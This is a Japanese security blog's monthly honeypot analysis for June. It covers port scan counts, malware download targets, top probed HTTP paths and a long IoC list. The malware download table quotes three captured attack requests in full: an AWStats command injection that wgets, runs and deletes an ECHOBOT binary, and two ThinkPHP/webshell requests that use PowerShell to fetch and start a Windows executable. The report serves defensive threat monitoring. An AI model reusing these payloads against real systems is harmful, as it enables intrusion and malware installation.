【ハニーポット月次分析】Honeypot 6月度〜VNC宛て通信増加中〜

Honeypot 月次分析6月度となります。来月からはsuricataも導入しているので来月はそちらの分析も出来ればと思っています。

【ハニーポット月次分析】Honeypot 6月度
◾️Honeytrap(80ポートは除く)

＜検知数＞

f:id:one-chick-sec:20190713213831p:plain

6/9の検知数が多いですが、これはポート14791宛にRDP向けの通信が多数発生したことが原因となっいます。
ペイロード：
Cookie: mstshash=Test

突発的に増加する大半はRDPへの通信であり、外部からアクセスできた場合、攻撃者側のリターンが大きくため、定期的に検知しているのではないかと推測しています。

＜ポート別検知数_前月差(Honeytrap)＞

ポート番号	サービス	件数	件数差(前月)
5900	vnc	149714	128430
445	smb	106044	-903
23	telnet	42814	-4681
110	pop3	29107	28940
3389	rdp	8278	-28026
3306	mysql	6438	430
10630		6218	6215
25	smtp	3783	-1410
5432		3300	-21480
2323	telnet	2447	-1128

＜ポート別検知数_90日平均差(Honeytrap)＞

ポート番号	サービス	件数	件数差(90日平均)
5900	vnc	149714	109398
445	smb	106044	633
23	telnet	42814	-8308
110	pop3	29107	27848
14791	Unknown	15851	15841
3389	rdp	8278	-6869
3306	mysql	6438	-3071
10630	Unknown	6218	6215
25	smtp	3783	1182
5432	Unknown	3300	-5132

vncおよびpop3宛てのポートへの通信が増加していました。どちらの通信も特に通信内容はなくポートが空いているかどうか調査しているものでした。vncについてはBluekeepでリモートアクセスに関する脆弱性によって検知数が増えたのかもしれません。
また、他のサービスがUnknownであるものはRDPへの不正アクセスを狙ったものでした。

＜マルウェアダウンロード対象別集計＞

対象	検知数
Realtek SDK	713
webshell	87
MVPower DVR	73
Huawei Home Device	71
Redis	59
Android Debug Bridge	53
Weblogic	29
Linksys ルータ	18
Apache Struts2	12
Elasticsearch	4
ZyXEL社ルータ	3
AVTECH	1

Realtek SDK を対象とした MiraiおよびGafgytのダウンロード狙ったものを多く検知していました。また、webshellやradisの検知もそこそこ検知いました。

◾️WoWHoneypot
<検知数>

f:id:one-chick-sec:20190713215412p:plain

<ターゲット別検知数 TOP10>

target	count
Tomcat	7362
WordPress	2138
-	848
FreePBX	732
IP camera	284
phpMyAdmin	167
Unauthorized Relay	137
Zabbix	42
ThinkPHP	15
.env file	14

Tomcatのコンソールへの不正アクセスを狙ったものが継続して多く検知していました。一方でIP cameraを狙った攻撃などもあり、徐々にIoTを狙った攻撃も増加傾向にあると思われます。

<検知パス TOP10>

wow_path_research	target	CVE	reference	count
/manager/html	Tomcat	-	-	7362
/wp-login.php	WordPress	-	-	956
/	-	-	-	795
/admin/assets/js/views/login.js	FreePBX	-	https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743	732
/tmpfs/auto.jpg	IP camera	-	-	284
/xmlrpc.php	WordPress	-	-	136
/wp5/wp-login.php	WordPress	-	-	95
/wp2/wp-login.php	WordPress	-	-	93
/forum/wp-login.php	WordPress	-	-	90
/wp/wp-login.php	WordPress	-	-	90

HTTPパスではTomcatマネージャへの不正アクセスが他のパスと比べて頭一つ多く検知していました。他はFreePBX、Wordpressを狙った攻撃を多く検知していました。

＜マルウェアダウンロード＞

MalwareDownload	path	payload	count
hxxp://31[.]13[.]195[.]251/ECHO/ECHOBOT[.]x86	/awstatstotals/awstatstotals.php	GET /awstatstotals/awstatstotals.php?sort=].passthru('echo%20YYY;cd%20/tmp;%20wget%20hxxp://xxx.xxx.xxx.xxx/ECHO/ECHOBOT.x86;%20chmod%20777%20ECHOBOT.x86;%20./ECHOBOT.x86;%20rm%20-rf%20ECHOBOT.x86;%20history%20-c;echo%20YYY;').exit().%24a[ HTTP/1.1..sort=].phpinfo().exit().$a[.User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1).Connection: Close..	1
hxxp://fid[.]hognoob[.]se/download[.]exe	/public/hydra.php	GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start%20%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe HTTP/1.1.Connection: Keep-Alive.Accept: /.Accept-Language: zh-cn.Referer: hxxp://xxx.xxx.xxx.xxx:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start %SystemRoot%/Temp/yorungtvlzcwfwq13178.exe.User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1).Host: xxx.xxx.xxx.xxx..	1
hxxp://fid[.]hognoob[.]se/download[.]exe	/public/index.php	GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid[.]hognoob[.]se/download[.]exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start%20%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe HTTP/1.1.Connection: Keep-Alive.Accept: /.Accept-Language: zh-cn.Referer: hxxp://xxx.xxx.xxx.xxx:80/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start %SystemRoot%/Temp/yorungtvlzcwfwq13178.exe.User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1).Host: xxx.xxx.xxx.xxx..	1

hydra.phpやindex.phpは他の攻撃によって設置されたWebshellであり、Webshellが設置されていた場合、マルウェアがダウンロードされるものとなります。拡張子がexeファイルであることからターゲットOSはwindowsを狙ったものとなります。
https://www.alibabacloud.com/blog/threat-alert-multiple-cryptocurrency-miner-botnets-start-to-exploit-the-new-thinkphp-vulnerability_594369
https://sec-owl.hatenablog.com/entry/2019/01/17/014528

<IoC情報>
WoWHoneypot

path	target	CVE	reference
/	-	-	-
/admin/assets/js/views/login.js	FreePBX	-	https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743
/siteblog/wp-login.php	WordPress	-	-
/myblog/wp-login.php	WordPress	-	-
/forum1/wp-login.php	WordPress	-	-
/WordPress9/wp-login.php	WordPress	-	-
/WordPress8/wp-login.php	WordPress	-	-
/WordPress7/wp-login.php	WordPress	-	-
/WordPress6/wp-login.php	WordPress	-	-
/WordPress4/wp-login.php	WordPress	-	-
/WordPress3/wp-login.php	WordPress	-	-
/WordPress2/wp-login.php	WordPress	-	-
/WordPress1/wp-login.php	WordPress	-	-
/wp8/wp-login.php	WordPress	-	-
/wp7/wp-login.php	WordPress	-	-
/wp5/wp-login.php	WordPress	-	-
/wp4/wp-login.php	WordPress	-	-
/wp3/wp-login.php	WordPress	-	-
/test/wp-login.php	WordPress	-	-
/wp1/wp-login.php	WordPress	-	-
/site/wp-login.php	WordPress	-	-
/blog/wp-login.php	WordPress	-	-
/forum/wp-login.php	WordPress	-	-
/WordPress/wp-login.php	WordPress	-	-
/wp/wp-login.php	WordPress	-	-
/wp-login.php	WordPress	-	-
/favicon.ico	-	-	-
/wp2/wp-login.php	WordPress	-	-
hxxp://110[.]249[.]212[.]46/testget	Unauthorized Relay	-	-
/TP/public/index.php	ThinkPHP	-	-
/robots.txt	-	-	-
///wp-json/wp/v2/users/	WordPress	-	-
///	-	-	-
/Temporary_Listen_Addresses/WSMAN	Microsoft SharePoint	CVE-2019-0604	https://www.alienvault.com/blogs/labs-research/sharepoint-vulnerability-exploited-in-the-wild
hxxp://172[.]247[.]32[.]25/ddd[.]html	Unauthorized Relay	-	-
/PMA/scripts/setup.php	phpMyAdmin	-	-
/~riba/pma/scripts/setup.php	phpMyAdmin	-	-
/alt/sqladmin/scripts/setup.php	phpMyAdmin	-	-
/phpMyAdmin-2.8.0.4/scripts/setup.php	phpMyAdmin	-	-
/pyaniste/mysqladmin/scripts/setup.php	phpMyAdmin	-	-
/admincooptel/phpMyAdmin/scripts/setup.php	phpMyAdmin	-	-
/phpmyadmin.box25/scripts/setup.php	phpMyAdmin	-	-
/phpmy/scripts/setup.php\	phpMyAdmin	-	-
/phpMyAdmin-www072510/scripts/setup.php	phpMyAdmin	-	-
/phpmy/scripts/setup.php	phpMyAdmin	-	-
/phpmyadmin/scripts/setup.php/index.php	phpMyAdmin	-	-
/php/phpMyAdmin/scripts/setup.php	phpMyAdmin	-	-
/admin/scripts/setup.php	phpMyAdmin	-	-
/php/scripts/setup.php	phpMyAdmin	-	-
/php-my-admin/scripts/setup.php	phpMyAdmin	-	-
/phpMyAdmin2/scripts/setup.php	phpMyAdmin	-	-
/sqladmin/scripts/setup.php	phpMyAdmin	-	-
/db/scripts/setup.php	phpMyAdmin	-	-
/websql/scripts/setup.php	phpMyAdmin	-	-
/admin/phpmyadmin/scripts/setup.php	phpMyAdmin	-	-
/_phpMyAdmin/scripts/setup.php	phpMyAdmin	-	-
/configuracion/phpmyadmin/scripts/setup.php	phpMyAdmin	-	-
/web/phpMyAdmin/scripts/setup.php	phpMyAdmin	-	-
/pHpMyAdMiN/scripts/setup.php	phpMyAdmin	-	-
/MySQL/scripts/setup.php	phpMyAdmin	-	-
/mysqladmin/scripts/setup.php	phpMyAdmin	-	-
/scripts/setup.php	phpMyAdmin	-	-
/MyAdmin/scripts/setup.php	phpMyAdmin	-	-
/w00tw00t.at.blackhats.romanian.anti-sec:)	phpMyAdmin	-	-
/epgrec/do-record.sh	epgrec	-	http://www.mda.or.jp/epgrec/index.php/epgrec%E3%81%AE%E3%82%A4%E3%83%B3%E3%82%B9%E3%83%88%E3%83%BC%E3%83%AB%E3%81%A8%E8%A8%AD%E5%AE%9A
/foltia/	foltia ANIME LOCKER	-	https://sec-owl.hatenablog.com/entry/2018/08/01/004310
/_async/AsyncResponseService	Oracle WebLogic Server	CVE-2019-2725	https://www.secure-sketch.com/blog/verify-oracle-weblogic-vulnerability
/.git/config	git	-	-
/siteblog//wp-json/wp/v2/users/	WordPress	-	-
/siteblog//	WordPress	-	-
/myblog//wp-json/wp/v2/users/	WordPress	-	-
/myblog//	WordPress	-	-
/forum1//wp-json/wp/v2/users/	WordPress	-	-
/forum1//	WordPress	-	-
/WordPress9//wp-json/wp/v2/users/	WordPress	-	-
/WordPress9//	WordPress	-	-
/WordPress8//wp-json/wp/v2/users/	WordPress	-	-
/WordPress8//	WordPress	-	-
/WordPress7//wp-json/wp/v2/users/	WordPress	-	-
/WordPress7//	WordPress	-	-
/WordPress6//wp-json/wp/v2/users/	WordPress	-	-
/WordPress6//	WordPress	-	-
/WordPress5//wp-json/wp/v2/users/	WordPress	-	-
/WordPress5//	WordPress	-	-
/WordPress5/wp-login.php	WordPress	-	-
/WordPress4//wp-json/wp/v2/users/	WordPress	-	-
/WordPress4//	WordPress	-	-
/WordPress3//wp-json/wp/v2/users/	WordPress	-	-
/WordPress3//	WordPress	-	-
/WordPress2//wp-json/wp/v2/users/	WordPress	-	-
/WordPress2//	WordPress	-	-
/WordPress1//wp-json/wp/v2/users/	WordPress	-	-
/WordPress1//	WordPress	-	-
/wp8//wp-json/wp/v2/users/	WordPress	-	-
/wp8//	WordPress	-	-
/wp7//wp-json/wp/v2/users/	WordPress	-	-
/wp7//	WordPress	-	-
/wp5//wp-json/wp/v2/users/	WordPress	-	-
/wp5//	WordPress	-	-
/wp4//wp-json/wp/v2/users/	WordPress	-	-
/wp4//	WordPress	-	-
/wp3//wp-json/wp/v2/users/	WordPress	-	-
/wp3//	WordPress	-	-
/wp2//wp-json/wp/v2/users/	WordPress	-	-
/wp2//	WordPress	-	-
/downloader/	-	-	-
/wp1//wp-json/wp/v2/users/	WordPress	-	-
/wp1//	WordPress	-	-
/site//wp-json/wp/v2/users/	WordPress	-	-
/site//	WordPress	-	-
/test//wp-json/wp/v2/users/	WordPress	-	-
/test//	WordPress	-	-
/blog//wp-json/wp/v2/users	WordPress	-	-
/blog//wp-json/wp/v2/users/	WordPress	-	-
/blog//	WordPress	-	-
/forum//wp-json/wp/v2/users/	WordPress	-	-
/forum//	WordPress	-	-
/WordPress//wp-json/wp/v2/users/	WordPress	-	-
/WordPress//	WordPress	-	-
/wp//wp-json/wp/v2/users/	WordPress	-	-
/wp//	WordPress	-	-
hxxp://112[.]124[.]42[.]80:63435/	Unauthorized Relay	-	-
/Temporary_Listen_Addresses/SMSSERVICE	Microsoft SharePoint	CVE-2019-0604	https://www.alienvault.com/blogs/labs-research/sharepoint-vulnerability-exploited-in-the-wild
/manager/html	Tomcat	-	-
/app/.env	.env file	-	-
/phpmyadmin/index.php	phpMyAdmin	-	-
/index.php	-	-	-
/HNAP1	D-Link DIR-850L	CVE-2015-2051	https://www.morihi-soc.net/?p=981
/evox/about	Trane Tracer SC	-	https://mogu2itachi.hatenablog.com/entry/2019/03/10/173327
/Nmap/folder/check1558950064	Nmap	-	-
/NmapUpperCheck1558950064	Nmap	-	-
/sdk	Vmware	-	https://github.com/nmap/nmap/blob/master/scripts/vmware-version.nse
/nmaplowercheck1558950064	Nmap	-	-
/Nmap/folder/check1558937902	Nmap	-	-
/NmapUpperCheck1558937902	Nmap	-	-
/nmaplowercheck1558937902	Nmap	-	-
/_search	Elasticsearch	CVE-2015-1427	https://www.morihi-soc.net/?p=442
/autodiscover	Zimbra	-	https://www.exploit-db.com/exploits/46967
/HNAP1/	D-Link DIR-850L	CVE-2015-2051	https://www.morihi-soc.net/?p=981
/.git/HEAD	git	-	-
/ipc$	IPC	-	https://thinline196.hatenablog.com/entry/2018/09/23/153019
/webdav/	WebDAV	-	-
hxxp://www[.]baidu[.]com/	Unauthorized Relay	-	-
www.baidu.com:443	Unauthorized Relay	-	-
hxxp://www[.]123cha[.]com/	Unauthorized Relay	-	-
cn.bing.com:443	Unauthorized Relay	-	-
hxxp://www[.]ip[.]cn/	Unauthorized Relay	-	-
hxxp://123[.]125[.]114[.]144/	Unauthorized Relay	-	-
/tmpfs/auto.jpg	IP camera	-	-
/admin/config.php	Admin config	-	-
hxxp://112[.]35[.]53[.]83:8088/index[.]php	Unauthorized Relay	-	-
hxxp://5[.]188[.]210[.]101/echo[.]php	Unauthorized Relay	-	-
/queryUserList	Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC}	-	https://github.com/mcw0/PoC/blob/master/TVT-PoC.py
/web/cgi-bin/hi3510/param.cgi	Zivif Web	CVE-2017-17106	https://sec-owl.hatenablog.com/entry/2018/09/24/011848
/system.ini	Microsoft Windows 3.1 System	-	https://www.weblio.jp/content/system.ini
/device.rsp	TBK Vision DVR	CVE-2018-9995	https://windabaft.co.jp/blog_ceo/?p=458
/System/configurationFile/	Hikvision IP camera	-	https://mogu2itachi.hatenablog.com/entry/2019/04/07/065650
/RPC2_Login	dahua camera	-	https://gist.github.com/avelardi/1338d9d7be0344ab7f4280618930cd0d
/\cgi-bin/login.cgi	CGI	-	-
/\cgi-bin/get_status.cgi	/\cgi-bin/get_status.cgi	-	-
/scripts/setup.php/index.php	phpMyAdmin	-	-
/PHPMYADMIN/scripts/setup.ph	phpMyAdmin	-	-
/phpMyAdmin/setup.php/index.php	phpMyAdmin	-	-
/phpmyadmin/setup.php	phpMyAdmin	-	-
/.env	.env file	-	-
//blog/	WordPress	-	-
/acadmin.php	Webshell	-	-
/current_config/passwd	dahua camera	-	https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py
/cgi-bin/user/Config.cgi	AVTECH AVN801 DVR	CVE-2013-4981	https://jvndb.jvn.jp/ja/contents/2013/JVNDB-2013-006100.html
/device_description.xml	UPnP	-	https://medium.com/@djboris/digging-into-upnp-by-searching-a-sonos-api-5e10e080a232
/login.html	login Page	-	-
/winbox.png	MikroTik	-	https://sec-owl.hatenablog.com/entry/2018/10/12/160525
/currentsetting.htm	NETGEAR Genie	-	https://qiita.com/comefigo/items/e9b1bce93c1b615e5934
/qnfxcjqr	Webshell	-	-
/fdsrwe	Webshell	-	-
/images/logo.gif	-	-	-
/home.asp	ASP	-	-
/tmpfs/snap.jpg	IP camera	-	https://www.ispyconnect.com/man.aspx?n=IPCMontor
/phpmyadmin/	phpMyAdmin	-	-
/sitemap.xml	xml sitemap	-	-
/login.cgi	login Page	-	-
/.well-known/security.txt	SSL certificate	-	https://qiita.com/comefigo/items/e9b1bce93c1b615e5934
/mysql/admin/index.php	phpMyAdmin	-	-
/redirect.php	PHP	-	-
//about.php	PHP	-	-
//admin/config.php	Admin config	-	-
//recordings/	FreePBX	-	https://cute-0tter.hatenablog.com/entry/2019/02/25/235730
//a2billing/customer/templates/default/footer.tpl	FreePBX	-	https://cute-0tter.hatenablog.com/entry/2019/02/25/235730
//vtigercrm/vtigerservice.php	vtiger vtiger CRM 5.2.1	-	https://www.securityfocus.com/bid/47267/info
hxxp://160[.]16[.]145[.]183/	Unauthorized Relay	-	-
/wp-admin/	WordPress	-	-
/admin.php	WordPress	-	https://nskw-style.com/2014/diary/visualize-wp-admin-flow.html
/ccvv	Unknown	-	-
/index.do	Apache Struts2	CVE-2017-5638	https://www.morihi-soc.net/?p=654
/index.action	Apache Struts2	CVE-2017-5638	https://github.com/mazen160/struts-pwn
/struts2-rest-showcase/orders.xhtml	Apache Struts2	CVE-2017-5638	https://blue-blue.hatenablog.com/entry/2017/03/12/212730
/server-status	Apache Server	-	https://github.com/mazen160/server-status_PWN
/developer/.env	.env file	-	-
/public/.env	.env file	-	-
/backup/.env	.env file	-	-
/portal/.env	.env file	-	-
/api/.env	.env file	-	-
/mobile/.env	.env file	-	-
/dev/.env	.env file	-	-
/m/.env	.env file	-	-
/admin/.env	.env file	-	-
/web/.env	.env file	-	-
/phpmyadmin	phpMyAdmin	-	-
/qzone/	-	-	-
xui.ptlogin2.qq.com:443	Unauthorized Relay	-	-
/console/login/LoginForm.jsp	Oracle WebLogic Server	CVE-2015-4852	https://www.exploit-db.com/exploits/46628
hxxp://check[.]proxyradar[.]com/azenv[.]php	Unauthorized Relay	-	-
/usr/share/phpmyadmin/libraries/select_lang.lib.php	phpMyAdmin	-	-
/phpMyAdmin/scripts/db___.init.php	phpMyAdmin	-	-
/phpMyAdmin-2.11.1-all-languages/scripts/setup.php	phpMyAdmin	-	-
/sqladm/scripts/setup.php	phpMyAdmin	-	-
/setup.php	PHP	-	-
/pma2012/	phpMyAdmin	-	-
/pma2011/	phpMyAdmin	-	-
/phpadmin/scripts/setup.php	phpMyAdmin	-	-
/phpMyAdmin-2.5.5/scripts/setup.php	phpMyAdmin	-	-
/dbadmin/scripts/setup.php	phpMyAdmin	-	-
/jmx-console/	Jboss	CVE-2010-0738	https://www.rapid7.com/db/modules/exploit/multi/http/jboss_maindeployer
*	-	-	-
/shop/wp-includes/wlwmanifest.xml	WordPress	-	-
/wp-includes/wlwmanifest.xml	WordPress	-	-
/website/wp-includes/wlwmanifest.xml	WordPress	-	-
/cms/wp-includes/wlwmanifest.xml	WordPress	-	-
/wp/wp-includes/wlwmanifest.xml	WordPress	-	-
/site/wp-includes/wlwmanifest.xml	WordPress	-	-
/dev/wp-includes/wlwmanifest.xml	WordPress	-	-
/wwww/wp-includes/wlwmanifest.xml	WordPress	-	-
/web/wp-includes/wlwmanifest.xml	WordPress	-	-
/WordPress/wp-includes/wlwmanifest.xml	WordPress	-	-
/blog/wp-includes/wlwmanifest.xml	WordPress	-	-
/2017/wp-login.php	WordPress	-	-
/1/wp-login.php	WordPress	-	-
/myforum/wp-login.php	WordPress	-	-
/teststite/wp-login.php	WordPress	-	-
/vlog/wp-login.php	WordPress	-	-
/shop/wp-login.php	WordPress	-	-
/nx8j78af1b.jsp	Webshell	-	-
/blog2/wp-login.php	WordPress	-	-
/upload/bank-icons/bank_16.png	Unknown	-	-
/upload/bank-icons/bank-gh.jpg	Unknown	-	-
hxxp://api[.]ipify[.]org/	Unauthorized Relay	-	-
hxxp://112[.]35[.]88[.]28:8088/index[.]php	Unauthorized Relay	-	-
/3/wp-login.php	WordPress	-	-
/backup/	-	-	-
/dbadmin/	phpMyAdmin	-	-
/myadmin/	phpMyAdmin	-	-
/pma/	phpMyAdmin	-	-
/admin/	-	-	-
/db/	-	-	-
/mysite/wp-login.php	WordPress	-	-
/2/wp-login.php	WordPress	-	-
/2018/wp-login.php	WordPress	-	-
/news/wp-login.php	WordPress	-	-
/blog3/wp-login.php	WordPress	-	-
/2019/wp-login.php	WordPress	-	-
/index_main.php	Unknown	-	-
/warning.html	Unknown	-	-
/xmlrpc.php	WordPress	-	-
/user/login.html	Unknown	-	-
hxxp://185[.]172[.]110[.]221:80/proxy_get[.]php	Unauthorized Relay	-	-
/public/hydra.php	Webshell	-	https://sec-owl.hatenablog.com/entry/2019/01/17/014528
/public/index.php	-	-	-
/login	-	-	-
/backup	-	-	-
hxxp://112[.]35[.]66[.]7:8088/index[.]php	Unauthorized Relay	-	-
hxxp://185[.]172[.]110[.]221/check[.]php	Unauthorized Relay	-	-
/main.php	-	-	-
/api_jsonrpc.php	Zabbix	-	-
/zabbix/api_jsonrpc.php	Zabbix	-	https://www.exploit-db.com/exploits/39937
//proxies.php	Zabbix	-	-
/zabbix//proxies.php	Zabbix	-	-
/zabbix/jsrpc.php	Zabbix	-	-
/jsrpc.php	Zabbix	-	-
/zabbix//httpmon.php	Zabbix	-	-
//httpmon.php	Zabbix	-	-
hxxp://112[.]35[.]63[.]31:8088/index[.]php	Unauthorized Relay	-	-
/forum1/xmlrpc.php	WordPress	-	-
/wp8/xmlrpc.php	WordPress	-	-
/WordPress8/xmlrpc.php	WordPress	-	-
/siteblog/xmlrpc.php	WordPress	-	-
/myblog/xmlrpc.php	WordPress	-	-
/WordPress9/xmlrpc.php	WordPress	-	-
/WordPress3/xmlrpc.php	WordPress	-	-
/WordPress6/xmlrpc.php	WordPress	-	-
/wp7/xmlrpc.php	WordPress	-	-
/WordPress1/xmlrpc.php	WordPress	-	-
/wp5/xmlrpc.php	WordPress	-	-
/test/xmlrpc.php	WordPress	-	-
/wp4/xmlrpc.php	WordPress	-	-
/wp3/xmlrpc.php	WordPress	-	-
/wp1/xmlrpc.php	WordPress	-	-
/site/xmlrpc.php	WordPress	-	-
/wp2/xmlrpc.php	WordPress	-	-
/forum/xmlrpc.php	WordPress	-	-
/wp/xmlrpc.php	WordPress	-	-
/WordPress/xmlrpc.php	WordPress	-	-
/WordPress7/xmlrpc.php	WordPress	-	-
/WordPress4/xmlrpc.php	WordPress	-	-
/WordPress2/xmlrpc.php	WordPress	-	-
/blog/xmlrpc.php	WordPress	-	-
/moo	Unknown	-	-
/html/.env	.env file	-	-
/Nmap/folder/check1560131930	Nmap	-	-
/NmapUpperCheck1560131930	Nmap	-	-
/nmaplowercheck1560131930	Nmap	-	-
/shell	Webshell	-	-
//MyAdmin/scripts/setup.php	phpMyAdmin	-	-
//phpMyAdmin/scripts/setup.php	phpMyAdmin	-	-
//pma/scripts/setup.php	phpMyAdmin	-	-
/CFIDE/administrator/	Adobe ColdFusion	-	https://www.exploit-db.com/exploits/14641
/muieblackcat	Scanner	-	https://eromang.zataz.com/2011/08/14/suc027-muieblackcat-setup-php-web-scanner-robot/
/smartdomuspad/modules/reporting/track_import_export.php	U.motion Builder	CVE-2018-7841	https://www.rcesecurity.com/2019/05/cve-2018-7841-schneider-electric-umotion-builder-remote-code-execution-0-day/
/images/favicon.ico	-	-	-
/scripts/ajaxPortal.lua	VMware NSX SD-WAN Edge by VeloCloud	CVE-2018-6961	https://www.exploit-db.com/exploits/44959
185.172.110.221:80	Unauthorized Relay	-	-
/awstatstotals/awstatstotals.php	AWStats Totals	CVE-2008-3922	https://www.bugsearch.net/en/11876/awstats-totals-v114-multisort-remote-command-execution-cve-2008-3922.html
/laravel/.env	.env file	-	-
/.bitcoin/.env	.env file	-	-
hxxp://10010[.]ah165[.]net:8088/hsp/out_of_service[.]jsp	Unauthorized Relay	-	-
/index.html	-	-	-
/Login.htm	-	-	-
/PMA2005/	phpMyAdmin	-	-
/SQLite/main.php	SQLiteManager	-	-
/SQLiteManager-1.2.4/main.php	SQLiteManager	-	-
/SQLiteManager/main.php	SQLiteManager	-	-
/agSearch/SQlite/main.php	SQLiteManager	-	-
/hudson/script	Unknown	-	-
/mysql-admin/	phpMyAdmin	-	-
/mysql/	phpMyAdmin	-	-
/mysqladmin/	phpMyAdmin	-	-
/mysqlmanager/	phpMyAdmin	-	-
/nagiosxi/images/loginsplash.png	phpMyAdmin	-	-
/openserver/phpmyadmin/	phpMyAdmin	-	-
/p/m/a/	phpMyAdmin	-	-
/php-my-admin/	phpMyAdmin	-	-
/php-myadmin/	phpMyAdmin	-	-
/phpMyAdmin-2.2.3/	phpMyAdmin	-	-
/phpMyAdmin-2.2.6/	phpMyAdmin	-	-
/phpMyAdmin-2.5.1/	phpMyAdmin	-	-
/phpMyAdmin-2.5.4/	phpMyAdmin	-	-
/phpMyAdmin-2.5.5-pl1/	phpMyAdmin	-	-
/phpMyAdmin-2.5.5-rc1/	phpMyAdmin	-	-
/phpMyAdmin-2.5.5-rc2/	phpMyAdmin	-	-
/phpMyAdmin-2.5.5/	phpMyAdmin	-	-
/phpMyAdmin-2.5.6-rc1/	phpMyAdmin	-	-
/phpMyAdmin-2.5.6-rc2/	phpMyAdmin	-	-
/phpMyAdmin-2.5.6/	phpMyAdmin	-	-
/phpMyAdmin-2.5.7-pl1/	phpMyAdmin	-	-
/phpMyAdmin-2.5.7/	phpMyAdmin	-	-
/phpMyAdmin-2.6.0-alpha/	phpMyAdmin	-	-
/phpMyAdmin-2.6.0-alpha2/	phpMyAdmin	-	-
/phpMyAdmin-2.6.0-beta1/	phpMyAdmin	-	-
/phpMyAdmin-2.6.0-beta2/	phpMyAdmin	-	-
/phpMyAdmin-2.6.0-pl1/	phpMyAdmin	-	-
/phpMyAdmin-2.6.0-pl2/	phpMyAdmin	-	-
/phpMyAdmin-2.6.0-pl3/	phpMyAdmin	-	-
/phpMyAdmin-2.6.0-rc1/	phpMyAdmin	-	-
/phpMyAdmin-2.6.0-rc2/	phpMyAdmin	-	-
/phpMyAdmin-2.6.0-rc3/	phpMyAdmin	-	-
/phpMyAdmin-2.6.0/	phpMyAdmin	-	-
/phpMyAdmin-2.6.1-pl1/	phpMyAdmin	-	-
/phpMyAdmin-2.6.1-pl2/	phpMyAdmin	-	-
/phpMyAdmin-2.6.1-pl3/	phpMyAdmin	-	-
/phpMyAdmin-2.6.1-rc1/	phpMyAdmin	-	-
/phpMyAdmin-2.6.1-rc2/	phpMyAdmin	-	-
/phpMyAdmin-2.6.1/	phpMyAdmin	-	-
/phpMyAdmin-2.6.2-beta1/	phpMyAdmin	-	-
/phpMyAdmin-2.6.2-pl1/	phpMyAdmin	-	-
/phpMyAdmin-2.6.2-rc1/	phpMyAdmin	-	-
/phpMyAdmin-2.6.2/	phpMyAdmin	-	-
/phpMyAdmin-2.6.3-pl1/	phpMyAdmin	-	-
/phpMyAdmin-2.6.3-rc1/	phpMyAdmin	-	-
/phpMyAdmin-2.6.3/	phpMyAdmin	-	-
/phpMyAdmin-2.6.4-pl1/	phpMyAdmin	-	-
/phpMyAdmin-2.6.4-pl2/	phpMyAdmin	-	-
/phpMyAdmin-2.6.4-pl3/	phpMyAdmin	-	-
/phpMyAdmin-2.6.4-pl4/	phpMyAdmin	-	-
/phpMyAdmin-2.6.4-rc1/	phpMyAdmin	-	-
/phpMyAdmin-2.6.4/	phpMyAdmin	-	-
/phpMyAdmin-2.7.0-beta1/	phpMyAdmin	-	-
/phpMyAdmin-2.7.0-pl1/	phpMyAdmin	-	-
/phpMyAdmin-2.7.0-pl2/	phpMyAdmin	-	-
/phpMyAdmin-2.7.0-rc1/	phpMyAdmin	-	-
/phpMyAdmin-2.7.0/	phpMyAdmin	-	-
/phpMyAdmin-2.8.0-beta1/	phpMyAdmin	-	-
/phpMyAdmin-2.8.0-rc1/	phpMyAdmin	-	-
/phpMyAdmin-2.8.0-rc2/	phpMyAdmin	-	-
/phpMyAdmin-2.8.0.1/	phpMyAdmin	-	-
/phpMyAdmin-2.8.0.2/	phpMyAdmin	-	-
/phpMyAdmin-2.8.0.3/	phpMyAdmin	-	-
/phpMyAdmin-2.8.0.4/	phpMyAdmin	-	-
/phpMyAdmin-2.8.0/	phpMyAdmin	-	-
/phpMyAdmin-2.8.1-rc1/	phpMyAdmin	-	-
/phpMyAdmin-2.8.1/	phpMyAdmin	-	-
/phpMyAdmin-2.8.2/	phpMyAdmin	-	-
/phpMyAdmin-2/	phpMyAdmin	-	-
/phpMyAdmin2/	phpMyAdmin	-	-
/phpmanager/	phpMyAdmin	-	-
/phpmy-admin/	phpMyAdmin	-	-
/script	-	-	-
/sqlmanager/	SQLiteManager	-	-
/sqlweb/	SQL	-	-
/systemInfo	Unknown	-	-
/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php	SQLiteManager	-	-
/webadmin/	SQL	-	-
/webdb/	SQL	-	-
/websql/	SQL	-	-
hxxp://www[.]msftncsi[.]com/ncsi[.]txt	Unauthorized Relay	-	-
/.html	-	-	-
hxxp://110[.]249[.]212[.]46/testget	Unauthorized Relay	-	-
hxxp://5[.]188[.]210[.]101/echo.php	Unauthorized Relay	-	-
/id_rsa	ssh	-	-
/smb_scheduler/	SimBankSchedulerServer	-	https://docuri.com/download/smb-server-install-guide_59c1dfd7f581710b2869684b_pdf
/user//	-	-	-
/user//wp-json/wp/v2/users/	WordPress	-	-
/user/wp-login.php	WordPress	-	-
